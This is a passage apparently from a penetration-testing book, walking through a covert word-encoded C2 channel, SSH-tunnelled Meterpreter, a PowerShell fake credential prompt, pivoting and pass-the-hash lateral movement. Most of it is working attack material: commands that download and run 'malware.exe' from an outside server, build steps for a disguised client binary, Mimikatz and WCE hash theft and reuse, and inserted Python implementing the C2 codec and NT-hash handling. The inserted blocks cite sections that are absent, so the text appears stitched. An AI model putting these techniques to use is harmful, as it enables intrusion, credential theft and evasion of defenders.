execute. You wait as it calls a PowerShell Meterpreter script and creates a reverse shell. Another use 
for something like the HID Keyboard Attack is with kiosks. I have seen plenty of kiosks that either 
have a limited physical/virtual keyboard, or no keyboard at all, but have USB ports. This is a great 
attack for just that. 


Building A Custom Reverse Shell 


I did a presentation at one of the LETHAL meetings about problems we sometimes encounter on 
engagements. As we run into more and more complex firewalls, we need to look at things differently. 
One thing I started seeing is application-based firewalls. The idea behind this is that the firewall 
looks at the packets to see if they are communicating the proper protocols on the proper ports. So, you 
can’t run SSH on web ports (80/443), and the company does full “man in the middle” SSL proxying. 
Therefore, not only do we need to look like the protocol expected on each port, but we also need 
to evade any sort of IDS. When I teach, I love to give the doomsday scenario. Let’s say Metasploit no 
longer works, you have full SSL interception, and the IDS works great. What can you do? 


I started building a framework exactly for this. What were my requirements? 

• Bypass application-based firewalls 

• Make everything seem normal to an analyst 

• Be able to have full control of the host 

• Be able to upload/download files 

• Make penetration testing faster 

• Generate client executables and evade AV 


I built and implemented the communication protocol first. From there, I can build all the modules. The 
implementation targeted the following: 

• Take the Top 500 Words 

• Any C2 communication between client and server 

o Get gzip for compression 
o Get base64 encoded for standard characters 
o Each letter is converted to a word 

• Make sure traffic looks random 

o The same cmd command doesn’t look the same (cmd != cmd) 
o Can’t build standard IDS signatures 

• Utilize system commands (PowerShell, WMI) 

• Python/pyinstaller 


Let’s walk through an example. Let’s say we want to send a “cmd ipconfig” command to get the IP of 
the host: 


Command                                            Result 
cmd ipconfig                                       cmd ipconfig (no change) 
Gzip compress "cmd ipconfig" (the bytes shown      x\x9cK\xceMQ\xc8,H\xce\xcfK\xcbL\x07\x00\x1d_\x04\xa4 
begin with x\x9c, a zlib stream header) 
Base64 encode the compressed bytes                 eJxLzk1RyCxIzs9Ly0wHAB1fBKQ= 
Random key generation (1-500)                      20 

Now that we have a base64 encoded string (eJxLzk1RyCxIzs9Ly0wHAB1fBKQ=) and a key of 20, we 
can generate obfuscated packets: 

Command                                                           Result 
Take the key (20) against the Top 500 Words and uppercase the     Where 
first letter 
Take the first letter from the base64 string                      Current Counter = 20 (key) + 5 (e is 
(eJxLzk1RyCxIzs9Ly0wHAB1fBKQ=) and add it to the key value        the 5th letter of the alphabet) = 25 
Find the 25th word in the Top 500 Words list                      did 
Continue for every letter in the base64 string                    Where did help wonder there would give... 


Server Implementation: 

The other requirement was to bypass application-based firewalls. To do this, we need to not only 
communicate over a web port, but we need it to look like web traffic. 


Victim                                     Server                       Details 
Request: POST Hello Request                Response: dog cat wool...    Victim sends Hello and Server responds with run ipconfig 
Processes ipconfig, then sends             Response: (Empty)            Victim processes ipconfig and sends server nothing back 
POST: Where am foreve tomorrow... 
Request: POST Hello Request                                             Victim keeps sending Hello pings until command is given 
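The word codec and the Hello/command/result exchange above, as an added example that is not the author's c2 code. The word list is a constructed stand-in for the Top 500 Words; the symbol order beyond the lowercase letters, the wrap-around past the end of the list, and the looks_like_word_c2, C2Server and victim_poll helpers are assumptions; and because the sample bytes on the page start with x\x9c (a zlib stream header, not gzip's) it compresses with zlib.compress. The defender-side check shows the point the text makes: with the word list in hand, the only reliable tell is that the "sentence" decodes to a valid zlib stream.

```python
import base64
import binascii
import secrets
import zlib

# Constructed stand-in for the author's "Top 500 Words" list (about 170 common
# English words, deduplicated); the real list is not reproduced here.
WORDS = list(dict.fromkeys("""
the of and to in is you that it he was for on are as with his they I at
be this have from or one had by word but not what all were we when your can said
there use an each which she do how their if will up other about out many then them
these so some her would make like him into time has look two more write go see number
no way could people my than first water been call who oil its now find long down day
did get come made may part over new sound take only little work know place year live
me back give most very after thing our just name good sentence man think say great
where help through much before line right too mean old any same tell boy follow came
want show also around form three small set put end does another well large must big
even such because turn here why ask went men read need land different home us move
""".lower().split()))
N = len(WORDS)
WORD_NUMBER = {w: i + 1 for i, w in enumerate(WORDS)}    # 1-based: "the 25th word"

# Assumed symbol order: the page only says "e is the 5th letter", so the lowercase
# letters come first and the rest of the base64 alphabet plus '=' follows.
SYMBOLS = "abcdefghijklmnopqrstuvwxyz" "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "0123456789+/="
SYMBOL_NUMBER = {c: i + 1 for i, c in enumerate(SYMBOLS)}
assert N > len(SYMBOLS), "the word list must be longer than the symbol set"


def word_at(n):
    """The n-th word, 1-based; wraps past the end of the list (assumption)."""
    return WORDS[(n - 1) % N]


def compressed_b64(text):
    """Compress then base64-encode, as the page's example table does."""
    return base64.b64encode(zlib.compress(text.encode())).decode()


def encode_message(text, key=None):
    """One word per base64 symbol: the first word carries the key (capitalised),
    every later word is word_at(key + symbol number). A fresh random key means
    the same command never produces the same words twice (cmd != cmd)."""
    if key is None:
        key = secrets.randbelow(N - 1) + 1          # page: random key in 1-500
    words = [word_at(key).capitalize()]
    words += [word_at(key + SYMBOL_NUMBER[c]) for c in compressed_b64(text)]
    return " ".join(words)


def decode_message(body):
    """Invert encode_message; raise ValueError for anything not in this scheme."""
    tokens = body.split()
    if not tokens:
        raise ValueError("empty body")
    try:
        numbers = [WORD_NUMBER[t.lower()] for t in tokens]
    except KeyError as exc:
        raise ValueError("word outside the list: %s" % exc) from None
    key, symbols = numbers[0], []
    for n in numbers[1:]:
        idx = (n - key) % N
        if not 1 <= idx <= len(SYMBOLS):
            raise ValueError("word number %d does not map to a symbol" % n)
        symbols.append(SYMBOLS[idx - 1])
    try:
        raw = base64.b64decode("".join(symbols), validate=True)
        return zlib.decompress(raw).decode()
    except (binascii.Error, zlib.error, UnicodeDecodeError) as exc:
        raise ValueError("payload is not base64+zlib: %s" % exc) from None


def looks_like_word_c2(body):
    """Defender-side check, assuming the word list has been recovered: a run of
    list words is not a signature, but decoding to a valid zlib stream is."""
    try:
        decode_message(body)
        return True
    except ValueError:
        return False


class C2Server:
    """Toy server side of the exchange table (hypothetical): a command is handed
    out only in reply to an encoded 'Hello' poll; any other POST is a result."""
    def __init__(self):
        self.queue, self.results = [], []

    def handle_post(self, body):
        text = decode_message(body)
        if text == "Hello":
            return encode_message(self.queue.pop(0)) if self.queue else ""
        self.results.append(text)
        return ""                                    # empty reply, as in the table


def victim_poll(server, run_command):
    """One client cycle: POST Hello, run whatever comes back, POST the output.
    Returns True when a command was received (hypothetical helper)."""
    reply = server.handle_post(encode_message("Hello"))
    if reply:
        server.handle_post(encode_message(run_command(decode_message(reply))))
    return bool(reply)
```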


Now that we have an understanding of how the clients will communicate to our server, let’s walk 
through the Proof of Concept (PoC). First install the c2 code and create a malicious binary. *Make 
sure to have SMBExec and Veil-Framework installed. These tools will install all the dependencies. 


• git clone https://github.com/cheetz/c2 /opt/c2/ 

• cd /opt/c2/ 

• chmod +x setup.sh 

• ./setup.sh 

• python ./server.py 

• help 

• generate binary [ip] [port] 




Starting Web Server 
Listening on Port: ... 
Server IP: ... 
Ready to accept connections 

Welcome to Covert Shell - MENU 

Command Summary: 
sessions                          list all sessions 
info [host]                       print info about a session 
cmd [host] [command]              command to run on host 
kill [host]                       kill specific session 
pwn                               pwn host and return ... 
sleep [command]                   change the sleep command 
post [host] [command]             post exploitation commands 
generate_binary [ip] [port]       create client binary 
exit 

> generate_binary 172.16.151.128 80 
INFO: wrote Z:\opt\c2\winword.spec 
INFO: Testing for ability to set i... 
INFO: ... resource update availab... 
INFO: UPX is not available. 


Custom C2 - Building a Payload 


We have generated a binary and it is saved to /opt/c2/dist/winword.exe. This is a python file turned 
into an executable that will communicate back to our server. We can now take that executable and 
move it to our victim system and run it. 


Once a victim has executed the client, you will see the hostname show up on the C2 server. We can 
run a quick help to see what we can do. One example is the info [host] command. If we run info win7, 
we see all the host information, such as user and system info, permissions, network information, 
netstat, and open shares. 




INFO: Appending archive to EXE Z:\opt\c2\dist\winword.exe 
> win7:Connectedv2 win7 
> info win7 
> win7:USER INFORMATION 

User Name           SID 
hacker\testuser1    S-1-5-21-3525058729-1821581466-2040179606-1106 

GROUP INFORMATION 

Group Name       Type               SID         Attributes 
Everyone         Well-known group   S-1-1-0     Enabled by default, Enabled group 
BUILTIN\Users    Alias              S-1-5-32    Enabled by default, Enabled group 


Custom C2 - Post Exploitation 



I also incorporated a ton of the standard post-exploitation commands. Although Metasploit and 
Meterpreter are amazing tools, sometimes it is hard to know exactly what to do next. That is why I 
created the post section specifically for Windows. It will do all the standard Windows post 
exploitation, such as list patches, list users, list all accounts in Active Directory, pull passwords 
with Mimikatz, bypassUAC, and popcreds. Just type “post” on the server and interact with: 

• post win7 password64 

• This will execute mimikatz on the end host and pull hashes. 




> win7:Connectedv2 win7 
> post 

Welcome to Covert Shell - POST 

Command Summary: 
cmd [host] [command]                          command to run on host 
post [host] adusers                           pull all ad users and info from AD 
post [host] password                          if the executable was run as admin... 
post [host] password64                        if the executable was run as admin... 
post [host] get_computer_details              get all computer details 
post [host] net_view                          finds all machines on the local do... 
post [host] win_patches                       list all windows hotfixes 
post [host] list_processes                    detailed list information on runni... 
post [host] list_users                        detailed list information on users 
post [host] downloadfile [file] [location]    send a file, location is ... 
post [host] bypassuac32                       bypass UAC for 32bit OS 
post [host] bypassuac64                       bypass UAC for 64bit OS 
post [host] pop_creds                         pop up a username/password box to ... 

> post win7 password64 
> win7: .#####.  mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 20 2014 08:56:...) 
                 Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 
                 http://blog.gentilkiwi.com/mimikatz 
                 with 14 modules 

mimikatz(powershell) # sekurlsa::... 

Authentication Id : ... 
Session           : ... 
User Name         : testuser1 
Domain            : HACKER 
SID               : S-1-5-21-... 
        msv : 
         [00000003] Primary 
         * Username : testuser1 
         * Domain   : HACKER 
         * NTLM     : <NT hash> 
         * SHA1     : <SHA1 hash> 


Custom C2 - BypassUAC and Mimikatz 


You also have the ability to run commands on the end host with cmd [hostname] “command”. More 
important than running these commands is: “What does the traffic look like?” Next, let’s look in 
Wireshark to view the TCP stream when we pull hashes in the next example. 
Custom C2 - TCP Stream Using Words 


As you can see, the client sent what looks to be a very badly constructed sentence and the response 
from the nginx C2 server (not really nginx but python) is a long run-on mix of words. Whether you are 
sending your victim’s files or commands, they will all follow the same structure. 


Think about this for a second: If you are monitoring the network or configuring an IDS, how do you 
detect this type of traffic? Unless you are reading line by line, the traffic looks just like normal web 
traffic. There are no patterns or special characters, and the sentences actually look like sentences (but 
don’t make sense of course). You could be on this host all day long and never be detected. This is just 
a PoC, which was developed for a specific penetration test. I recommend you take the code and 
expand on it or build your own. 


Evading Application Based Firewalls 


We are seeing more and more UTM-based firewalls that perform Application Level Filtering, 
meaning that if your traffic isn’t the right protocol for the defined port, it is going to be denied, 
which will trigger an alert. 


Building a communication tunnel yourself would be a great exercise for any pentester. Luckily, David 
Kennedy has already done the work for you.(50)(51) I forked a copy from David’s Github; however, I 
did have to make one change. On line 108, I commented out the “break” in his code. 

Installation and configuration: 

• git clone https://github.com/cheetz/meterssh /opt/meterssh 

• cd /opt/meterssh 

• gedit meterssh.py 

• At the bottom modify the following: 

• user = "sshuser" 

• password = "sshpw" 

• rhost = "192.168.1.1" 

• port = "22" 

Make sure Veil-Evasion is installed as it takes care of many of the dependencies. It takes a little work 
to get everything configured since we need to start the SSH service and install some dependencies: 

• service ssh start 

• git clone https://github.com/warner/python-ecdsa.git /opt/python-ecdsa 

• cd /opt/python-ecdsa/ && wine C:/Python27/python.exe ./setup.py install 

• git clone https://github.com/paramiko/paramiko.git /opt/paramiko 

• cd /opt/paramiko/ && wine C:/Python27/python.exe ./setup.py install 

• git clone https://github.com/pyinstaller/pyinstaller.git /opt/pyinstaller 

• cd /opt/pyinstaller/ && wine C:/Python27/python.exe /opt/pyinstaller/setup.py install 

• cd /opt/ && wget https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.zip#md5=3eb18a454311707ab7808d881e677329 && unzip PyInstaller-2.1.zip 

• cd /opt/meterssh/ 

• wine C:/Python27/python.exe /opt/PyInstaller-2.1/pyinstaller.py --noconsole --onefile meterssh.py 

After it successfully completes, you should have a new Windows Executable located at 
/opt/meterssh/dist/meterssh.exe. Copy this file to your victim host and start the meterssh.exe. 

• cd /opt/meterssh/ && python ./monitor.py 

• Execute the executable on a victim host 



INFO: checking Analysis 
INFO: checking PYZ 
INFO: checking PKG 
INFO: building because Z:\opt\meterssh\build\meterssh\meterssh.exe changed 
INFO: building PKG (CArchive) out00-PKG.pkg 
INFO: checking EXE 
INFO: rebuilding out00-EXE.toc because pkg is more recent 
INFO: building EXE from out00-EXE.toc 
INFO: Appending archive to EXE Z:\opt\meterssh\dist\meterssh.exe 
root@kali:/opt/meterssh# cd /opt/meterssh/ && python ./monitor.py 
[*] Launching count monitor at 5 second intervals... 
[*] Polling... Waiting for connection into SSH encrypted tunnel... 
[*] Polling... Waiting for connection into SSH encrypted tunnel... 
[*] Polling... Waiting for connection into SSH encrypted tunnel... 
[*] Encrypted tunnel identified. Yipee, we gots a shell! 
[*] Creating a quick Metasploit answer file for you... 
[*] Launching Metasploit... Wait one minute... 

C:\Users\cheetz\Desktop\meterssh.exe 
[*] Shellcode injection loaded into memory... 
[*] Spawning meterpreter on localhost on port 8021 
[*] Tunneling SSH, this takes a moment. 
[*] You should have a shell raining in a sec. 
[*] Connected to [SSH server IP]:22 successfully 


MeterSSH 


The binary file we created executed on the victim host, connected back to our server over SSH and 
created a local port forward on 8021. Additionally, the binary tunnels a Meterpreter shell through the 
SSH tunnel, bypassing any IDS or application-based firewalls. 


[*] Processing answer.txt for ERB directives. 
resource (answer.txt)> use multi/handler 
resource (answer.txt)> set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_tcp 
resource (answer.txt)> set RHOST 0.0.0.0 
RHOST => 0.0.0.0 
resource (answer.txt)> set LPORT 8021 
LPORT => 8021 
resource (answer.txt)> exploit 

[*] Starting the payload handler... 
[*] Started bind handler 
[*] Sending stage (770048 bytes) to 0.0.0.0 
[*] Meterpreter session 1 opened (127.0.0.1:31769 -> 127.0.0.1:8021) at ...-22 17:55:45 -0500 

meterpreter > shell 
Process 5936 created. 
Channel 1 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Users\cheetz\Desktop> 


SSH Tunnel 


Powershell 


As you can see, PowerShell is an amazing tool to use for any penetration tester. 

One of my favorite attacks is the simplest. If you ever end up on a host where you have limited 
privileges, which prevents you from using Mimikatz or even dropping executables, you can always 
ask a user for their password. 


Let’s say you have a shell on a system (doesn’t have to be Meterpreter), what if you could push a 
popup to prompt the user to type in their credentials? Let’s demonstrate the power of PowerShell: 

• cd /opt/Easy-P 

• python ./easy-p 

• 7 - Base64 Encode 

• 1 - From File 

• /opt/PowerShell_Popup/popup.ps1 


==Easy-P== 

[1] Privilege Escalation 
[2] Lateral Movement 
[3] Keylogging 
[4] PowerShell Meterpreter 
[5] Change Users Execution Policy 
[6] Powershell 101 
[7] Base64 Encode a PowerShell Script 
[8] Mimikatz - Passwords from Memory 
[99] Exit/Quit 

Select An Option: 7 
1 - File, 2 - One liner: 1 
full file path and file: /opt/PowerShell_Popup/popup.ps1 
[*]Powershell.exe -NoP -Exec Bypass -enc ZgBlAG4AYwB0AGkAb... 


Base64 Encoded PowerShell Password Popup 


The output will be a long, base64 encoded string. Once we execute the command on our victim’s host, 
we should see results similar to those below. 



meterpreter > shell 
Process 8924 created. 
Channel 1 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Users\cheetz>Powershell.exe -NoP -Exec Bypass -enc ZgBlAG4A... 
admin 
password 

(Popup shown to the user: “Credentials are required...” / “Please enter your user name and 
password”, with User name and Password fields and an OK button.) 


PowerShell Password Popup 


The window on the right shows that the victim received a popup that says, “Credentials are 
required.” Once the victim enters their credentials and hits OK, the response is sent back to our 
command shell. This is where a little social engineering takes place. In some cases, the user might hit 
cancel or close the password prompt without typing in their credentials, but ... if you run the 
command three or four more times, more than likely, the user will get tired of the message and will 
end up putting in their password. A benefit of this type of attack is that the victim host did not need to 
download anything from the Internet, since you encoded the whole payload, and we did not need any 
elevated privile ges. 


Windows 7/8 Uploading Files To The Host 


On Windows 7 and 8, a better way to get files on a host is using bitsadmin or PowerShell. Using 
bitsadmin is great because it is used for Windows updates and utilizes IE proxy settings. If the 
organization has a web proxy that requires AD credentials, this will allow you to get around it. 


PowerShell (check the Post Exploitation with PowerSploit section for more details): 

• cmd.exe /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.securepla.net/malware.exe','malware.exe');(New-Object -com Shell.Application).ShellExecute('malware.exe')" 


Bitsadmin 

• cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://www.securepla.net/malware.exe c:\malware.exe&start malware.exe" 

Pivoting 


If you have compromised a host and realize that it is either dual-homed or connected to multiple 
networks, your attacks will have to pivot through that compromised host. The following example will 
route a port scan through our initial victim host to the segmented network. 


Autoroute and Auxiliary Scan 

• run autoroute -s 192.168.1.0/24 

• run autoroute -p 

• background 

• use auxiliary/scanner/portscan/tcp 

• set RHOSTS 192.168.1.127 

• set PORTS 135,139,445 

• set THREADS 20 

• exploit 



msf exploit(...) > sessions -i 1 
[*] Starting interaction with 1... 

meterpreter > run autoroute -s 192.168.1.0/24 
[*] Adding a route to 192.168.1.0/255.255.255.0... 
[+] Added route to 192.168.1.0/255.255.255.0 via 192.168.3.73 
[*] Use the -p option to list all active routes 
meterpreter > run autoroute -p 

Active Routing Table 
==================== 

   Subnet             Netmask            Gateway 
   ------             -------            ------- 
   192.168.1.0        255.255.255.0      Session 1 

meterpreter > background 
[*] Backgrounding session 1... 
msf exploit(...) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > set RHOSTS 192.168.1.127 
RHOSTS => 192.168.1.127 
msf auxiliary(tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp): 

   Name         Current Setting  Required  Description 
   ----         ---------------  --------  ----------- 
   CONCURRENCY  10               yes       The number of concurren... 
   PORTS        1-10000          yes       Ports to scan (e.g. 22... 
   RHOSTS       192.168.1.127    yes       The target address rang... 
   THREADS      1                yes       The number of concurren... 
   TIMEOUT      1000             yes       The socket connect tim... 

msf auxiliary(tcp) > set PORTS 137,139,445 
PORTS => 137,139,445 
msf auxiliary(tcp) > exploit 

[*] 192.168.1.127:445 - TCP OPEN 
[*] 192.168.1.127:139 - TCP OPEN 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


Pivoting 





Now that we have a pivot set up, we can use additional tools through that same pivot tunnel: 

• use auxiliary/scanner/discovery/udp_probe 

• use exploit/windows/smb/psexec 


Socks Proxy 

Sometimes you need to run non-metasploit modules through your first victim host. It might be a 
vulnerability scanner, nmap, or a particular exploit. Once we have a Meterpreter shell, we can 
background that session and add some routes. We want to be able to pivot through this first host and 
run nmap in our example. 

In our next example, our victim host has an IP of 192.168.2.24, but also has access to the 
192.168.1.0/24 range. Since we can’t access that network directly, we will have to pivot off this box 
using proxychains: (52)(53) 

• route add 192.168.1.0 255.255.255.0 4 

• route print 

• use auxiliary/server/socks4a 

• run 


This enables a listener on our Kali attacker host on port 1080. We now need to modify the default 
proxychains configuration to match our Metasploit settings. After that, we can kick off nmap through 
our socks4 proxy using the proxychains tool: 

• gedit /etc/proxychains.conf 

o change “socks4 127.0.0.1 4444” to “socks4 127.0.0.1 1080” 

• proxychains nmap -sT -P0 -p 135,139,445 192.168.1.127 


The output should look something like: 

• root@kali:~# gedit /etc/proxychains.conf 

• root@kali:~# proxychains nmap -sT -P0 -p135,139,445 192.168.1.127 

• ProxyChains-3.1 (http://proxychains.sf.net) 

Starting Nmap 6.47 (http://nmap.org) at 2015-03-21 17:10 EDT 
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:135-<><>-OK 
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:139-<><>-OK 
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:445-<><>-OK 
Nmap scan report for win7-core (192.168.1.127) 

Host is up (1.5s latency). 

PORT    STATE SERVICE 
135/tcp open  msrpc 
139/tcp open  netbios-ssn 
445/tcp open  microsoft-ds 



Move Laterally with Hashes 

As you might have heard, pass-the-hash is dead... or is it? A big change that occurred in the last year 
is that Microsoft patched the ability to connect to remote systems using accounts that are members of 
the localgroup “Administrators”. This used to be the easiest method to move laterally when you 
grabbed Local Admin passwords from Group Policy Preferences and used PSExec. 


There is one exception to this: the patch did not affect local default admin accounts with RID 500. 
Even if you changed the username for the RID 500 account, it can still be used to move laterally.(54) 
(55) 


Once you obtain hashes for the RID 500 account or you get onto a network without patched client 
systems, you can use the hashes, instead of passwords, to gain Meterpreter shells. As specified 
before, we are going to use psexec_psh instead of the standard psexec. 



Module options (exploit/windows/smb/psexec_psh): 

   Name                  Current Setting  Required  Description 
   ----                  ---------------  --------  ----------- 
   DryRun                false            no        Prints the powershell comm... 
   RHOST                 172.16.151.201   yes       The target address 
   RPORT                 445              yes       Set the SMB service port 
   SERVICE_DESCRIPTION                    no        Service description to to ... 
   SERVICE_DISPLAY_NAME                   no        The service display name 
   SERVICE_NAME                           no        The service name 
   SMBDomain             WORKGROUP        no        The Windows domain to use ... 
   SMBPass                                no        The password for the speci... 
   SMBUser                                no        The username to authentica... 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic 

msf exploit(psexec_psh) > set SMBPass aad3b435b51404eeaad3b435b51404ee:<NT hash> 
SMBPass => aad3b435b51404eeaad3b435b51404ee:<NT hash> 
msf exploit(psexec_psh) > set SMBUser Administrator 
SMBUser => Administrator 
msf exploit(psexec_psh) > exploit 

[*] Started reverse handler on 172.16.151.141:4444 
[*] 172.16.151.201:445 - Executing the payload... 
[+] 172.16.151.201:445 - Service start timed out, OK if running a command or n... 
[*] Sending stage (770948 bytes) to 172.16.151.201 
[*] Meterpreter session 5 opened (172.16.151.141:4444 -> 172.16.151.201:60529) 


Using Hashes to Pivot 


By setting SMBPass to use the hash, we don’t need to crack any hashes to exploit remote systems. 


Moving Laterally with NTLM Hashes 

We know if we have other users logged into the system, we can use incognito and impersonate tokens. 
(56) What if you had hashes from different systems and wanted to become the remote user on the 
current compromised machine? 






This is where we can use our manipulated WCE (Windows Credential Editor) binary that we 
configured in the Evading AV section and use it to import hashes onto our victim host. For the 
example below, we are assuming we already have local admin or system type access. With our 
Meterpreter shell, upload your WCE binary to an accessible location: 

• upload /opt/wce.exe C:\\users\\public 

We can drop into a shell with the “shell” command and list our current hashes on the local machine: 

• shell 

• cd \users\public 

• wce -l


meterpreter > upload /opt/wce.exe C:\\users\\public
[*] uploading  : /opt/wce.exe -> C:\users\public
[*] uploaded   : /opt/wce.exe -> C:\users\public\wce.exe
meterpreter > shell
Process 2480 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd \users\public

C:\Users\Public>wce -l
WCE v1.42beta (X64) (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa
Use -h for help.

testuser1:HACKER:00000000000000000000000000000000:0AA3D8C4A87962D9356E09480DE5EBBE
WIN7$:HACKER:00000000000000000000000000000000:5611751320655F7DB1FC94E1FB3CBBCE


WCE - Importing Hashes


Notice we only have two sets of hashes on this system. From a prior compromise, we were able to 
get the hashes of a domain administrator. We need to import these hashes onto our current victim host 
with the following command: 

• wce.exe -s <user>:<domain>:<LM hash>:<NT hash>

o When only the NT hash is known, the LM field can be all zeros (as in the wce -l output above) or the empty-LM value aad3b435b51404eeaad3b435b51404ee.


As you can see from the image below, we were successful in importing the hashes for the user “lab”. 



C:\Users\Public>wce -s lab:HACKER:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe
WCE v1.42beta (X64) (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa
Use -h for help.

Changing NTLM credentials of current logon session (0007D51Eh) to:
Username: lab
domain: HACKER
LMHash: aad3b435b51404eeaad3b435b51404ee
NTHash: 0aa3d8c4a87962d9356e09480de5ebbe
NTLM credentials successfully changed!

C:\Users\Public>dir \\dc\c$
Access is denied.

C:\Users\Public>net use * \\dc\c$ /user:hacker\lab
Drive Z: is now connected to \\dc\c$.

The command completed successfully.

C:\Users\Public>dir Z:\
 Volume in drive Z has no label.

 Directory of Z:\

08/22/2013  08:52 AM    <DIR>          PerfLogs
12/29/2014  03:23 PM    <DIR>          Program Files
08/22/2013  08:39 AM    <DIR>          Program Files (x86)
01/19/2015  05:35 PM    <DIR>          Share
02/05/2015  12:29 AM    <DIR>          Users
01/05/2015  02:02 AM    <DIR>          Windows


WCE - Access Hosts Using Hashes 



With lab's hashes imported into our logon session, we can try to reach the domain controller's C-drive. The first attempt, "dir \\dc\c$", comes back with access denied: that request is not going out as the "lab" account. Mounting the share explicitly under the imported credentials forces a fresh SMB session as lab:

• net use * \\dc\c$ /user:hacker\lab

No password is needed, because the NTLM credentials now cached in the logon session are used to authenticate. The image above shows the domain controller's C-drive mounted as the Z-drive, and we now have the ability to interact with the DC.

This attack leads to a wealth of additional attacks and is a great complement for smart, lateral 
movement. 
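The psexec_psh and WCE steps above both consume the same thing, an LM:NT hash pair, and the hashdump in the Cobalt Strike section later prints the same format. The following Python is an added example, not code from this book or from WCE or Metasploit. It computes an NT hash (MD4 over the UTF-16LE encoding of the password, unsalted, which is exactly why the hash can stand in for the password) using a small pure-Python MD4 so it runs offline, parses pwdump-style lines ("user:rid:lm:nt:::", what hashdump prints) and WCE-style lines ("user:domain:lm:nt") into the SMBPass form psexec_psh expects, and flags two things worth checking before pivoting: the well-known empty-LM constant aad3b435b51404eeaad3b435b51404ee (LM storage is disabled, there is nothing to crack in that field) and the empty-password NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 (the account has a blank password or, more often, is disabled). The two sample lines are constructed from values printed on this page.

```python
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password: LM storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF


def _md4_block(state, block):
    # One 64-byte block of RFC 1320 MD4; X holds the 16 little-endian words.
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for i in range(16):                                   # round 1: words in order
        a = _rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                   # round 2: words column-wise (0,4,8,12,1,...)
        k = (i % 4) * 4 + i // 4
        a = _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
        a, b, c, d = d, a, b, c
    order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for i in range(16):                                   # round 3: bit-reversed word order
        a = _rotl((a + H(b, c, d) + X[order[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
        a, b, c, d = d, a, b, c
    return [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)               # message length in bits, little-endian
    for off in range(0, len(msg), 64):
        state = _md4_block(state, msg[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). No salt, so the hash itself is the credential."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hash_line(line: str) -> dict:
    """Accept pwdump 'user:rid:lm:nt:::' (Metasploit hashdump) or WCE 'user:domain:lm:nt'."""
    f = line.strip().split(":")
    if len(f) >= 4 and f[1].isdigit():
        user, domain, lm, nt = f[0], None, f[2], f[3]
    elif len(f) == 4:
        user, domain, lm, nt = f[0], f[1], f[2], f[3]
    else:
        raise ValueError("unrecognised hash line: %r" % line)
    lm, nt = lm.lower(), nt.lower()
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError("hash fields must be 32 hex characters: %r" % line)
    return {
        "user": user, "domain": domain, "lm": lm, "nt": nt,
        "smbpass": "%s:%s" % (lm, nt),            # the value psexec_psh wants in SMBPass
        "lm_disabled": lm in (EMPTY_LM, "0" * 32),
        "empty_password": nt == EMPTY_NT,
    }


# Constructed sample input, taken from the WCE and hashdump output shown on this page.
SAMPLE_LINES = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "testuser1:HACKER:00000000000000000000000000000000:0AA3D8C4A87962D9356E09480DE5EBBE",
]


def triage(lines):
    return [parse_hash_line(l) for l in lines]


if __name__ == "__main__":
    for rec in triage(SAMPLE_LINES):
        flag = "EMPTY PASSWORD / likely disabled" if rec["empty_password"] else "usable for pass-the-hash"
        print("%-14s SMBPass=%s  %s" % (rec["user"], rec["smbpass"], flag))
    print("nt_hash('password') =", nt_hash("password"))
```

Run against the Cobalt Strike hashdump later in this chapter, the local Administrator line is the empty-password hash, so that account is not the one to pivot with; testuser1's line, on the other hand, gives the exact SMBPass string used in the psexec_psh session above.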


Moving Laterally with WMI 

